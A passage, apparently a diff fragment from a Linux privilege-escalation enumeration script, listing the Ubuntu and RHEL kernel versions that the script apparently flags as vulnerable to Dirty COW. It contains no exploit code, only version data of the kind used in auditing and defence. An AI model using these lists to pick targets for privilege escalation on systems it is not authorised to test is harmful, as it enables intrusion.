2.4.11| 2.4.10| 2.2.24"
-kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual" 
-kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-pae|3.2.0-35-virtual" 
-kernelDCW_Ubuntu_Precise_3="3.2.0-36-generic|3.2.0-36-generic-pae|3.2.0-36-lowlatency|3.2.0-36-lowlatency-pae|3.2.0-36-virtual|3.2.0-37-generic|3.2.0-37-generic-pae|3.2.0-37-lowlatency|3.2.0-37-lowlatency-pae|3.2.0-37-virtual|3.2.0-38-generic|3.2.0-38-generic-pae|3.2.0-38-lowlatency|3.2.0-38-lowlatency-pae|3.2.0-38-virtual|3.2.0-39-generic|3.2.0-39-generic-pae|3.2.0-39-lowlatency|3.2.0-39-lowlatency-pae|3.2.0-39-virtual|3.2.0-40-generic|3.2.0-40-generic-pae|3.2.0-40-lowlatency|3.2.0-40-lowlatency-pae|3.2.0-40-virtual|3.2.0-41-generic|3.2.0-41-generic-pae|3.2.0-41-lowlatency|3.2.0-41-lowlatency-pae|3.2.0-41-virtual|3.2.0-43-generic|3.2.0-43-generic-pae|3.2.0-43-virtual|3.2.0-44-generic|3.2.0-44-generic-pae|3.2.0-44-lowlatency|3.2.0-44-lowlatency-pae|3.2.0-44-virtual|3.2.0-45-generic|3.2.0-45-generic-pae|3.2.0-45-virtual|3.2.0-48-generic|3.2.0-48-generic-pae|3.2.0-48-lowlatency|3.2.0-48-lowlatency-pae|3.2.0-48-virtual|3.2.0-51-generic|3.2.0-51-generic-pae|3.2.0-51-lowlatency|3.2.0-51-lowlatency-pae|3.2.0-51-virtual|3.2.0-52-generic|3.2.0-52-generic-pae|3.2.0-52-lowlatency|3.2.0-52-lowlatency-pae|3.2.0-52-virtual|3.2.0-53-generic" 
-kernelDCW_Ubuntu_Precise_4="3.2.0-53-generic-pae|3.2.0-53-lowlatency|3.2.0-53-lowlatency-pae|3.2.0-53-virtual|3.2.0-54-generic|3.2.0-54-generic-pae|3.2.0-54-lowlatency|3.2.0-54-lowlatency-pae|3.2.0-54-virtual|3.2.0-55-generic|3.2.0-55-generic-pae|3.2.0-55-lowlatency|3.2.0-55-lowlatency-pae|3.2.0-55-virtual|3.2.0-56-generic|3.2.0-56-generic-pae|3.2.0-56-lowlatency|3.2.0-56-lowlatency-pae|3.2.0-56-virtual|3.2.0-57-generic|3.2.0-57-generic-pae|3.2.0-57-lowlatency|3.2.0-57-lowlatency-pae|3.2.0-57-virtual|3.2.0-58-generic|3.2.0-58-generic-pae|3.2.0-58-lowlatency|3.2.0-58-lowlatency-pae|3.2.0-58-virtual|3.2.0-59-generic|3.2.0-59-generic-pae|3.2.0-59-lowlatency|3.2.0-59-lowlatency-pae|3.2.0-59-virtual|3.2.0-60-generic|3.2.0-60-generic-pae|3.2.0-60-lowlatency|3.2.0-60-lowlatency-pae|3.2.0-60-virtual|3.2.0-61-generic|3.2.0-61-generic-pae|3.2.0-61-virtual|3.2.0-63-generic|3.2.0-63-generic-pae|3.2.0-63-lowlatency|3.2.0-63-lowlatency-pae|3.2.0-63-virtual|3.2.0-64-generic|3.2.0-64-generic-pae|3.2.0-64-lowlatency|3.2.0-64-lowlatency-pae|3.2.0-64-virtual|3.2.0-65-generic|3.2.0-65-generic-pae|3.2.0-65-lowlatency|3.2.0-65-lowlatency-pae|3.2.0-65-virtual|3.2.0-67-generic|3.2.0-67-generic-pae|3.2.0-67-lowlatency|3.2.0-67-lowlatency-pae|3.2.0-67-virtual|3.2.0-68-generic" 
-kernelDCW_Ubuntu_Precise_5="3.2.0-68-generic-pae|3.2.0-68-lowlatency|3.2.0-68-lowlatency-pae|3.2.0-68-virtual|3.2.0-69-generic|3.2.0-69-generic-pae|3.2.0-69-lowlatency|3.2.0-69-lowlatency-pae|3.2.0-69-virtual|3.2.0-70-generic|3.2.0-70-generic-pae|3.2.0-70-lowlatency|3.2.0-70-lowlatency-pae|3.2.0-70-virtual|3.2.0-72-generic|3.2.0-72-generic-pae|3.2.0-72-lowlatency|3.2.0-72-lowlatency-pae|3.2.0-72-virtual|3.2.0-73-generic|3.2.0-73-generic-pae|3.2.0-73-lowlatency|3.2.0-73-lowlatency-pae|3.2.0-73-virtual|3.2.0-74-generic|3.2.0-74-generic-pae|3.2.0-74-lowlatency|3.2.0-74-lowlatency-pae|3.2.0-74-virtual|3.2.0-75-generic|3.2.0-75-generic-pae|3.2.0-75-lowlatency|3.2.0-75-lowlatency-pae|3.2.0-75-virtual|3.2.0-76-generic|3.2.0-76-generic-pae|3.2.0-76-lowlatency|3.2.0-76-lowlatency-pae|3.2.0-76-virtual|3.2.0-77-generic|3.2.0-77-generic-pae|3.2.0-77-lowlatency|3.2.0-77-lowlatency-pae|3.2.0-77-virtual|3.2.0-79-generic|3.2.0-79-generic-pae|3.2.0-79-lowlatency|3.2.0-79-lowlatency-pae|3.2.0-79-virtual|3.2.0-80-generic|3.2.0-80-generic-pae|3.2.0-80-lowlatency|3.2.0-80-lowlatency-pae|3.2.0-80-virtual|3.2.0-82-generic|3.2.0-82-generic-pae|3.2.0-82-lowlatency|3.2.0-82-lowlatency-pae|3.2.0-82-virtual|3.2.0-83-generic|3.2.0-83-generic-pae|3.2.0-83-virtual|3.2.0-84-generic" 
-kernelDCW_Ubuntu_Precise_6="3.2.0-84-generic-pae|3.2.0-84-virtual|3.2.0-85-generic|3.2.0-85-generic-pae|3.2.0-85-virtual|3.2.0-86-generic|3.2.0-86-generic-pae|3.2.0-86-virtual|3.2.0-87-generic|3.2.0-87-generic-pae|3.2.0-87-virtual|3.2.0-88-generic|3.2.0-88-generic-pae|3.2.0-88-virtual|3.2.0-89-generic|3.2.0-89-generic-pae|3.2.0-89-virtual|3.2.0-90-generic|3.2.0-90-generic-pae|3.2.0-90-virtual|3.2.0-91-generic|3.2.0-91-generic-pae|3.2.0-91-virtual|3.2.0-92-generic|3.2.0-92-generic-pae|3.2.0-92-virtual|3.2.0-93-generic|3.2.0-93-generic-pae|3.2.0-93-virtual|3.2.0-94-generic|3.2.0-94-generic-pae|3.2.0-94-virtual|3.2.0-95-generic|3.2.0-95-generic-pae|3.2.0-95-virtual|3.2.0-96-generic|3.2.0-96-generic-pae|3.2.0-96-virtual|3.2.0-97-generic|3.2.0-97-generic-pae|3.2.0-97-virtual|3.2.0-98-generic|3.2.0-98-generic-pae|3.2.0-98-virtual|3.2.0-99-generic|3.2.0-99-generic-pae|3.2.0-99-virtual|3.5.0-40-generic|3.5.0-41-generic|3.5.0-42-generic|3.5.0-43-generic|3.5.0-44-generic|3.5.0-45-generic|3.5.0-46-generic|3.5.0-49-generic|3.5.0-51-generic|3.5.0-52-generic|3.5.0-54-generic|3.8.0-19-generic|3.8.0-21-generic|3.8.0-22-generic|3.8.0-23-generic|3.8.0-27-generic|3.8.0-29-generic|3.8.0-30-generic|3.8.0-31-generic|3.8.0-32-generic|3.8.0-33-generic|3.8.0-34-generic|3.8.0-35-generic|3.8.0-36-generic|3.8.0-37-generic|3.8.0-38-generic|3.8.0-39-generic|3.8.0-41-generic|3.8.0-42-generic" 
-kernelDCW_Ubuntu_Trusty_1="3.13.0-24-generic|3.13.0-24-generic-lpae|3.13.0-24-lowlatency|3.13.0-24-powerpc-e500|3.13.0-24-powerpc-e500mc|3.13.0-24-powerpc-smp|3.13.0-24-powerpc64-emb|3.13.0-24-powerpc64-smp|3.13.0-27-generic|3.13.0-27-lowlatency|3.13.0-29-generic|3.13.0-29-lowlatency|3.13.0-3-exynos5|3.13.0-30-generic|3.13.0-30-lowlatency|3.13.0-32-generic|3.13.0-32-lowlatency|3.13.0-33-generic|3.13.0-33-lowlatency|3.13.0-34-generic|3.13.0-34-lowlatency|3.13.0-35-generic|3.13.0-35-lowlatency|3.13.0-36-generic|3.13.0-36-lowlatency|3.13.0-37-generic|3.13.0-37-lowlatency|3.13.0-39-generic|3.13.0-39-lowlatency|3.13.0-40-generic|3.13.0-40-lowlatency|3.13.0-41-generic|3.13.0-41-lowlatency|3.13.0-43-generic|3.13.0-43-lowlatency|3.13.0-44-generic|3.13.0-44-lowlatency|3.13.0-46-generic|3.13.0-46-lowlatency|3.13.0-48-generic|3.13.0-48-lowlatency|3.13.0-49-generic|3.13.0-49-lowlatency|3.13.0-51-generic|3.13.0-51-lowlatency|3.13.0-52-generic|3.13.0-52-lowlatency|3.13.0-53-generic|3.13.0-53-lowlatency|3.13.0-54-generic|3.13.0-54-lowlatency|3.13.0-55-generic|3.13.0-55-lowlatency|3.13.0-57-generic|3.13.0-57-lowlatency|3.13.0-58-generic|3.13.0-58-lowlatency|3.13.0-59-generic|3.13.0-59-lowlatency|3.13.0-61-generic|3.13.0-61-lowlatency|3.13.0-62-generic|3.13.0-62-lowlatency|3.13.0-63-generic|3.13.0-63-lowlatency|3.13.0-65-generic|3.13.0-65-lowlatency|3.13.0-66-generic|3.13.0-66-lowlatency" 
-kernelDCW_Ubuntu_Trusty_2="3.13.0-67-generic|3.13.0-67-lowlatency|3.13.0-68-generic|3.13.0-68-lowlatency|3.13.0-70-generic|3.13.0-70-lowlatency|3.13.0-71-generic|3.13.0-71-lowlatency|3.13.0-73-generic|3.13.0-73-lowlatency|3.13.0-74-generic|3.13.0-74-lowlatency|3.13.0-76-generic|3.13.0-76-lowlatency|3.13.0-77-generic|3.13.0-77-lowlatency|3.13.0-79-generic|3.13.0-79-lowlatency|3.13.0-83-generic|3.13.0-83-lowlatency|3.13.0-85-generic|3.13.0-85-lowlatency|3.13.0-86-generic|3.13.0-86-lowlatency|3.13.0-87-generic|3.13.0-87-lowlatency|3.13.0-88-generic|3.13.0-88-lowlatency|3.13.0-91-generic|3.13.0-91-lowlatency|3.13.0-92-generic|3.13.0-92-lowlatency|3.13.0-93-generic|3.13.0-93-lowlatency|3.13.0-95-generic|3.13.0-95-lowlatency|3.13.0-96-generic|3.13.0-96-lowlatency|3.13.0-98-generic|3.13.0-98-lowlatency|3.16.0-25-generic|3.16.0-25-lowlatency|3.16.0-26-generic|3.16.0-26-lowlatency|3.16.0-28-generic|3.16.0-28-lowlatency|3.16.0-29-generic|3.16.0-29-lowlatency|3.16.0-31-generic|3.16.0-31-lowlatency|3.16.0-33-generic|3.16.0-33-lowlatency|3.16.0-34-generic|3.16.0-34-lowlatency|3.16.0-36-generic|3.16.0-36-lowlatency|3.16.0-37-generic|3.16.0-37-lowlatency|3.16.0-38-generic|3.16.0-38-lowlatency|3.16.0-39-generic|3.16.0-39-lowlatency|3.16.0-41-generic|3.16.0-41-lowlatency|3.16.0-43-generic|3.16.0-43-lowlatency|3.16.0-44-generic|3.16.0-44-lowlatency|3.16.0-45-generic" 
-kernelDCW_Ubuntu_Trusty_3="3.16.0-45-lowlatency|3.16.0-46-generic|3.16.0-46-lowlatency|3.16.0-48-generic|3.16.0-48-lowlatency|3.16.0-49-generic|3.16.0-49-lowlatency|3.16.0-50-generic|3.16.0-50-lowlatency|3.16.0-51-generic|3.16.0-51-lowlatency|3.16.0-52-generic|3.16.0-52-lowlatency|3.16.0-53-generic|3.16.0-53-lowlatency|3.16.0-55-generic|3.16.0-55-lowlatency|3.16.0-56-generic|3.16.0-56-lowlatency|3.16.0-57-generic|3.16.0-57-lowlatency|3.16.0-59-generic|3.16.0-59-lowlatency|3.16.0-60-generic|3.16.0-60-lowlatency|3.16.0-62-generic|3.16.0-62-lowlatency|3.16.0-67-generic|3.16.0-67-lowlatency|3.16.0-69-generic|3.16.0-69-lowlatency|3.16.0-70-generic|3.16.0-70-lowlatency|3.16.0-71-generic|3.16.0-71-lowlatency|3.16.0-73-generic|3.16.0-73-lowlatency|3.16.0-76-generic|3.16.0-76-lowlatency|3.16.0-77-generic|3.16.0-77-lowlatency|3.19.0-20-generic|3.19.0-20-lowlatency|3.19.0-21-generic|3.19.0-21-lowlatency|3.19.0-22-generic|3.19.0-22-lowlatency|3.19.0-23-generic|3.19.0-23-lowlatency|3.19.0-25-generic|3.19.0-25-lowlatency|3.19.0-26-generic|3.19.0-26-lowlatency|3.19.0-28-generic|3.19.0-28-lowlatency|3.19.0-30-generic|3.19.0-30-lowlatency|3.19.0-31-generic|3.19.0-31-lowlatency|3.19.0-32-generic|3.19.0-32-lowlatency|3.19.0-33-generic|3.19.0-33-lowlatency|3.19.0-37-generic|3.19.0-37-lowlatency|3.19.0-39-generic|3.19.0-39-lowlatency|3.19.0-41-generic|3.19.0-41-lowlatency|3.19.0-42-generic" 
-kernelDCW_Ubuntu_Trusty_4="3.19.0-42-lowlatency|3.19.0-43-generic|3.19.0-43-lowlatency|3.19.0-47-generic|3.19.0-47-lowlatency|3.19.0-49-generic|3.19.0-49-lowlatency|3.19.0-51-generic|3.19.0-51-lowlatency|3.19.0-56-generic|3.19.0-56-lowlatency|3.19.0-58-generic|3.19.0-58-lowlatency|3.19.0-59-generic|3.19.0-59-lowlatency|3.19.0-61-generic|3.19.0-61-lowlatency|3.19.0-64-generic|3.19.0-64-lowlatency|3.19.0-65-generic|3.19.0-65-lowlatency|3.19.0-66-generic|3.19.0-66-lowlatency|3.19.0-68-generic|3.19.0-68-lowlatency|3.19.0-69-generic|3.19.0-69-lowlatency|3.19.0-71-generic|3.19.0-71-lowlatency|3.4.0-5-chromebook|4.2.0-18-generic|4.2.0-18-lowlatency|4.2.0-19-generic|4.2.0-19-lowlatency|4.2.0-21-generic|4.2.0-21-lowlatency|4.2.0-22-generic|4.2.0-22-lowlatency|4.2.0-23-generic|4.2.0-23-lowlatency|4.2.0-25-generic|4.2.0-25-lowlatency|4.2.0-27-generic|4.2.0-27-lowlatency|4.2.0-30-generic|4.2.0-30-lowlatency|4.2.0-34-generic|4.2.0-34-lowlatency|4.2.0-35-generic|4.2.0-35-lowlatency|4.2.0-36-generic|4.2.0-36-lowlatency|4.2.0-38-generic|4.2.0-38-lowlatency|4.2.0-41-generic|4.2.0-41-lowlatency|4.4.0-21-generic|4.4.0-21-lowlatency|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" -kernelDCW_Ubuntu_Xenial="4.4.0-1009-raspi2|4.4.0-1012-snapdragon|4.4.0-21-generic|4.4.0-21-generic-lpae|4.4.0-21-lowlatency|4.4.0-21-powerpc-e500mc|4.4.0-21-powerpc-smp|4.4.0-21-powerpc64-emb|4.4.0-21-powerpc64-smp|4.4.0-22-generic|4.4.0-22-lowlatency|4.4.0-24-generic|4.4.0-24-lowlatency|4.4.0-28-generic|4.4.0-28-lowlatency|4.4.0-31-generic|4.4.0-31-lowlatency|4.4.0-34-generic|4.4.0-34-lowlatency|4.4.0-36-generic|4.4.0-36-lowlatency|4.4.0-38-generic|4.4.0-38-lowlatency|4.4.0-42-generic|4.4.0-42-lowlatency" 
-kernelDCW_Rhel5_1="2.6.24.7-74.el5rt|2.6.24.7-81.el5rt|2.6.24.7-93.el5rt|2.6.24.7-101.el5rt|2.6.24.7-108.el5rt|2.6.24.7-111.el5rt|2.6.24.7-117.el5rt|2.6.24.7-126.el5rt|2.6.24.7-132.el5rt|2.6.24.7-137.el5rt|2.6.24.7-139.el5rt|2.6.24.7-146.el5rt|2.6.24.7-149.el5rt|2.6.24.7-161.el5rt|2.6.24.7-169.el5rt|2.6.33.7-rt29.45.el5rt|2.6.33.7-rt29.47.el5rt|2.6.33.7-rt29.55.el5rt|2.6.33.9-rt31.64.el5rt|2.6.33.9-rt31.67.el5rt|2.6.33.9-rt31.86.el5rt|2.6.18-8.1.1.el5|2.6.18-8.1.3.el5|2.6.18-8.1.4.el5|2.6.18-8.1.6.el5|2.6.18-8.1.8.el5|2.6.18-8.1.10.el5|2.6.18-8.1.14.el5|2.6.18-8.1.15.el5|2.6.18-53.el5|2.6.18-53.1.4.el5|2.6.18-53.1.6.el5|2.6.18-53.1.13.el5|2.6.18-53.1.14.el5|2.6.18-53.1.19.el5|2.6.18-53.1.21.el5|2.6.18-92.el5|2.6.18-92.1.1.el5|2.6.18-92.1.6.el5|2.6.18-92.1.10.el5|2.6.18-92.1.13.el5|2.6.18-92.1.18.el5|2.6.18-92.1.22.el5|2.6.18-92.1.24.el5|2.6.18-92.1.26.el5|2.6.18-92.1.27.el5|2.6.18-92.1.28.el5|2.6.18-92.1.29.el5|2.6.18-92.1.32.el5|2.6.18-92.1.35.el5|2.6.18-92.1.38.el5|2.6.18-128.el5|2.6.18-128.1.1.el5|2.6.18-128.1.6.el5|2.6.18-128.1.10.el5|2.6.18-128.1.14.el5|2.6.18-128.1.16.el5|2.6.18-128.2.1.el5|2.6.18-128.4.1.el5|2.6.18-128.4.1.el5|2.6.18-128.7.1.el5|2.6.18-128.8.1.el5|2.6.18-128.11.1.el5|2.6.18-128.12.1.el5|2.6.18-128.14.1.el5|2.6.18-128.16.1.el5|2.6.18-128.17.1.el5|2.6.18-128.18.1.el5|2.6.18-128.23.1.el5|2.6.18-128.23.2.el5|2.6.18-128.25.1.el5|2.6.18-128.26.1.el5|2.6.18-128.27.1.el5" 
-kernelDCW_Rhel5_2="2.6.18-128.29.1.el5|2.6.18-128.30.1.el5|2.6.18-128.31.1.el5|2.6.18-128.32.1.el5|2.6.18-128.35.1.el5|2.6.18-128.36.1.el5|2.6.18-128.37.1.el5|2.6.18-128.38.1.el5|2.6.18-128.39.1.el5|2.6.18-128.40.1.el5|2.6.18-128.41.1.el5|2.6.18-164.el5|2.6.18-164.2.1.el5|2.6.18-164.6.1.el5|2.6.18-164.9.1.el5|2.6.18-164.10.1.el5|2.6.18-164.11.1.el5|2.6.18-164.15.1.el5|2.6.18-164.17.1.el5|2.6.18-164.19.1.el5|2.6.18-164.21.1.el5|2.6.18-164.25.1.el5|2.6.18-164.25.2.el5|2.6.18-164.28.1.el5|2.6.18-164.30.1.el5|2.6.18-164.32.1.el5|2.6.18-164.34.1.el5|2.6.18-164.36.1.el5|2.6.18-164.37.1.el5|2.6.18-164.38.1.el5|2.6.18-194.el5|2.6.18-194.3.1.el5|2.6.18-194.8.1.el5|2.6.18-194.11.1.el5|2.6.18-194.11.3.el5|2.6.18-194.11.4.el5|2.6.18-194.17.1.el5|2.6.18-194.17.4.el5|2.6.18-194.26.1.el5|2.6.18-194.32.1.el5|2.6.18-238.el5|2.6.18-238.1.1.el5|2.6.18-238.5.1.el5|2.6.18-238.9.1.el5|2.6.18-238.12.1.el5|2.6.18-238.19.1.el5|2.6.18-238.21.1.el5|2.6.18-238.27.1.el5|2.6.18-238.28.1.el5|2.6.18-238.31.1.el5|2.6.18-238.33.1.el5|2.6.18-238.35.1.el5|2.6.18-238.37.1.el5|2.6.18-238.39.1.el5|2.6.18-238.40.1.el5|2.6.18-238.44.1.el5|2.6.18-238.45.1.el5|2.6.18-238.47.1.el5|2.6.18-238.48.1.el5|2.6.18-238.49.1.el5|2.6.18-238.50.1.el5|2.6.18-238.51.1.el5|2.6.18-238.52.1.el5|2.6.18-238.53.1.el5|2.6.18-238.54.1.el5|2.6.18-238.55.1.el5|2.6.18-238.56.1.el5|2.6.18-274.el5|2.6.18-274.3.1.el5|2.6.18-274.7.1.el5|2.6.18-274.12.1.el5" 
-kernelDCW_Rhel5_3="2.6.18-274.17.1.el5|2.6.18-274.18.1.el5|2.6.18-308.el5|2.6.18-308.1.1.el5|2.6.18-308.4.1.el5|2.6.18-308.8.1.el5|2.6.18-308.8.2.el5|2.6.18-308.11.1.el5|2.6.18-308.13.1.el5|2.6.18-308.16.1.el5|2.6.18-308.20.1.el5|2.6.18-308.24.1.el5|2.6.18-348.el5|2.6.18-348.1.1.el5|2.6.18-348.2.1.el5|2.6.18-348.3.1.el5|2.6.18-348.4.1.el5|2.6.18-348.6.1.el5|2.6.18-348.12.1.el5|2.6.18-348.16.1.el5|2.6.18-348.18.1.el5|2.6.18-348.19.1.el5|2.6.18-348.21.1.el5|2.6.18-348.22.1.el5|2.6.18-348.23.1.el5|2.6.18-348.25.1.el5|2.6.18-348.27.1.el5|2.6.18-348.28.1.el5|2.6.18-348.29.1.el5|2.6.18-348.30.1.el5|2.6.18-348.31.2.el5|2.6.18-371.el5|2.6.18-371.1.2.el5|2.6.18-371.3.1.el5|2.6.18-371.4.1.el5|2.6.18-371.6.1.el5|2.6.18-371.8.1.el5|2.6.18-371.9.1.el5|2.6.18-371.11.1.el5|2.6.18-371.12.1.el5|2.6.18-398.el5|2.6.18-400.el5|2.6.18-400.1.1.el5|2.6.18-402.el5|2.6.18-404.el5|2.6.18-406.el5|2.6.18-407.el5|2.6.18-408.el5|2.6.18-409.el5|2.6.18-410.el5|2.6.18-411.el5|2.6.18-412.el5" -kernelDCW_Rhel6_1="2.6.33.9-rt31.66.el6rt|2.6.33.9-rt31.74.el6rt|2.6.33.9-rt31.75.el6rt|2.6.33.9-rt31.79.el6rt|3.0.9-rt26.45.el6rt|3.0.9-rt26.46.el6rt|3.0.18-rt34.53.el6rt|3.0.25-rt44.57.el6rt|3.0.30-rt50.62.el6rt|3.0.36-rt57.66.el6rt|3.2.23-rt37.56.el6rt|3.2.33-rt50.66.el6rt|3.6.11-rt28.20.el6rt|3.6.11-rt30.25.el6rt|3.6.11.2-rt33.39.el6rt|3.6.11.5-rt37.55.el6rt|3.8.13-rt14.20.el6rt|3.8.13-rt14.25.el6rt|3.8.13-rt27.33.el6rt|3.8.13-rt27.34.el6rt|3.8.13-rt27.40.el6rt|3.10.0-229.rt56.144.el6rt|3.10.0-229.rt56.147.el6rt|3.10.0-229.rt56.149.el6rt|3.10.0-229.rt56.151.el6rt|3.10.0-229.rt56.153.el6rt|3.10.0-229.rt56.158.el6rt|3.10.0-229.rt56.161.el6rt|3.10.0-229.rt56.162.el6rt|3.10.0-327.rt56.170.el6rt|3.10.0-327.rt56.171.el6rt|3.10.0-327.rt56.176.el6rt|3.10.0-327.rt56.183.el6rt|3.10.0-327.rt56.190.el6rt|3.10.0-327.rt56.194.el6rt|3.10.0-327.rt56.195.el6rt|3.10.0-327.rt56.197.el6rt|3.10.33-rt32.33.el6rt|3.10.33-rt32.34.el6rt|3.10.33-rt32.43.el6rt|3.10.33-rt32.45.el6rt|3.10.33-rt32.51.el6rt|3.10.33-rt32.52.el6rt|3.10.5
8-rt62.58.el6rt|3.10.58-rt62.60.el6rt|2.6.32-71.7.1.el6|2.6.32-71.14.1.el6|2.6.32-71.18.1.el6|2.6.32-71.18.2.el6|2.6.32-71.24.1.el6|2.6.32-71.29.1.el6|2.6.32-71.31.1.el6|2.6.32-71.34.1.el6|2.6.32-71.35.1.el6|2.6.32-71.36.1.el6|2.6.32-71.37.1.el6|2.6.32-71.38.1.el6|2.6.32-71.39.1.el6|2.6.32-71.40.1.el6|2.6.32-131.0.15.el6|2.6.32-131.2.1.el6|2.6.32-131.4.1.el6|2.6.32-131.6.1.el6|2.6.32-131.12.1.el6" -kernelDCW_Rhel6_2="2.6.32-131.17.1.el6|2.6.32-131.21.1.el6|2.6.32-131.22.1.el6|2.6.32-131.25.1.el6|2.6.32-131.26.1.el6|2.6.32-131.28.1.el6|2.6.32-131.29.1.el6|2.6.32-131.30.1.el6|2.6.32-131.30.2.el6|2.6.32-131.33.1.el6|2.6.32-131.35.1.el6|2.6.32-131.36.1.el6|2.6.32-131.37.1.el6|2.6.32-131.38.1.el6|2.6.32-131.39.1.el6|2.6.32-220.el6|2.6.32-220.2.1.el6|2.6.32-220.4.1.el6|2.6.32-220.4.2.el6|2.6.32-220.4.7.bgq.el6|2.6.32-220.7.1.el6|2.6.32-220.7.3.p7ih.el6|2.6.32-220.7.4.p7ih.el6|2.6.32-220.7.6.p7ih.el6|2.6.32-220.7.7.p7ih.el6|2.6.32-220.13.1.el6|2.6.32-220.17.1.el6|2.6.32-220.23.1.el6|2.6.32-220.24.1.el6|2.6.32-220.25.1.el6|2.6.32-220.26.1.el6|2.6.32-220.28.1.el6|2.6.32-220.30.1.el6|2.6.32-220.31.1.el6|2.6.32-220.32.1.el6|2.6.32-220.34.1.el6|2.6.32-220.34.2.el6|2.6.32-220.38.1.el6|2.6.32-220.39.1.el6|2.6.32-220.41.1.el6|2.6.32-220.42.1.el6|2.6.32-220.45.1.el6|2.6.32-220.46.1.el6|2.6.32-220.48.1.el6|2.6.32-220.51.1.el6|2.6.32-220.52.1.el6|2.6.32-220.53.1.el6|2.6.32-220.54.1.el6|2.6.32-220.55.1.el6|2.6.32-220.56.1.el6|2.6.32-220.57.1.el6|2.6.32-220.58.1.el6|2.6.32-220.60.2.el6|2.6.32-220.62.1.el6|2.6.32-220.63.2.el6|2.6.32-220.64.1.el6|2.6.32-220.65.1.el6|2.6.32-220.66.1.el6|2.6.32-220.67.1.el6|2.6.32-279.el6|2.6.32-279.1.1.el6|2.6.32-279.2.1.el6|2.6.32-279.5.1.el6|2.6.32-279.5.2.el6|2.6.32-279.9.1.el6|2.6.32-279.11.1.el6|2.6.32-279.14.1.bgq.el6|2.6.32-279.14.1.el6|2.6.32-279.19.1.el6|2.6.32-279.22.1.el6|2.6.32-279.23.1.el6|2.6.32-279.25.1.el6|2.6.32-279.25.2.el6|2.6.32-279.31.1.el6|2.6.32-279.33.1.el6|2.6.32-279.34.1.el6|2.6.32-279.37.2.el6|2.6.32-279.39.1.el6" 
-kernelDCW_Rhel6_3="2.6.32-279.41.1.el6|2.6.32-279.42.1.el6|2.6.32-279.43.1.el6|2.6.32-279.43.2.el6|2.6.32-279.46.1.el6|2.6.32-358.el6|2.6.32-358.0.1.el6|2.6.32-358.2.1.el6|2.6.32-358.6.1.el6|2.6.32-358.6.2.el6|2.6.32-358.6.3.p7ih.el6|2.6.32-358.11.1.bgq.el6|2.6.32-358.11.1.el6|2.6.32-358.14.1.el6|2.6.32-358.18.1.el6|2.6.32-358.23.2.el6|2.6.32-358.28.1.el6|2.6.32-358.32.3.el6|2.6.32-358.37.1.el6|2.6.32-358.41.1.el6|2.6.32-358.44.1.el6|2.6.32-358.46.1.el6|2.6.32-358.46.2.el6|2.6.32-358.48.1.el6|2.6.32-358.49.1.el6|2.6.32-358.51.1.el6|2.6.32-358.51.2.el6|2.6.32-358.55.1.el6|2.6.32-358.56.1.el6|2.6.32-358.59.1.el6|2.6.32-358.61.1.el6|2.6.32-358.62.1.el6|2.6.32-358.65.1.el6|2.6.32-358.67.1.el6|2.6.32-358.68.1.el6|2.6.32-358.69.1.el6|2.6.32-358.70.1.el6|2.6.32-358.71.1.el6|2.6.32-358.72.1.el6|2.6.32-358.73.1.el6|2.6.32-358.11